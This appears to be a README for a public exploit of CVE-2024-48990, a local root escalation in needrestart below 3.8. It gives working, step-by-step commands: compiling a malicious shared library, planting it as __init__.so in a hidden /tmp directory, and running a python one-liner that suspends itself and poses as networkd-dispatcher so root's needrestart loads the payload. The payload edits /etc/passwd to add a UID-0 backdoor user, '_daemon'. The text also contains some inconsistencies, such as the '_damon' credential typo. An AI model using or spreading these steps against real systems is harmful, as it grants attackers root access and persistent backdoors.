Exploit for CVE-2024-48990 (Local Privilege Escalation in needrestart < 3.8)
Read https://blog.qualys.com/vulnerabilities-threat-research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation-vulnerabilities-in-needrestart. Qualys does a great job explaining it.
TLDR;
On systems with needrestart less than 3.8, local users can execute arbitrary code and escalate privileges to root with no user interaction.
The exploit as it's written now will add a new user called "_daemon" to the system with UID/GID of 0 (root) by using a sed command to edit the /etc/passwd file. The password is the same as the username. Not even sure you could call it an exploit since it's just a shared library that runs a single command.
To compile the exploit for yourself, run the below:
gcc exploit.c -o exploit.so -shared -fPIC -s
1. Create a directory to store the exploit files. The directory you create needs to have a subdirectory called "importlib"
mkdir -p /tmp/.X11-Unix/importlib
You could run any long-running python script. But to look less suspicious in the process list, you can use this one liner to start a python interpreter that gets suspended as soon as it starts (so it never actually executes anything).
-
PYTHON - The path to the python interpreter
-
ARGV - The string that will appear in the process list
-
PYPATH - The path to the directory you created (not including the importlib directory)
For ARGV make sure that:
-
the path to the python interpreter is the first argument in ARGV
-
the second argument (the "script") is a file that actually exists on the system (needrestart checks this). Doesn't need to be a real python script.
-
the second argument isn't the same as a process that's already running (needrestart will use the "cached" one it has already seen).
Other than that, you can play around with the ARGV as much as you want. Maybe make it look like a normal system process?
PYPATH=/tmp/e/ PYTHON=/usr/bin/python3 ARGV='/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers' python3 -c 'import os,ctypes; libc=ctypes.CDLL("libc.so.6"); pid=os.fork(); exit() if pid > 0 else print("\n",os.getpid()); libc.ptrace(0, 0, 0, 0); os.execvpe(os.environ["PYTHON"], os.environ["ARGV"].split(), {"PYTHONPATH":os.environ["PYPATH"]})'
It needs to be within the importlib directory and named "init.so"
mv /tmp/exploit.so /tmp/.X11-Unix/importlib/__init__.so
The next time needrestart runs (ie an update with apt or unattended upgrades starts it), it will run python with our process' PYTHONPATH variable and load the init.so file, which will run our command. You'll be able to login in with the creds _damon:_daemon.
needrestart isn't completely dumb and checks a few things when scanning processes and before it enters the vulnerable part of the code
- Is the process a running python script? If not, it skips it (python -c processes get skipped)
- Has the process already been seen? Can't make a carbon copy of another process (ie unattended-upgrade-shutdown or networkd-dispatcher) or it'll get skipped.
- If /etc/needrestart/needrestart.conf has "$nrconf{interpscan}" set to "0", you're out of luck.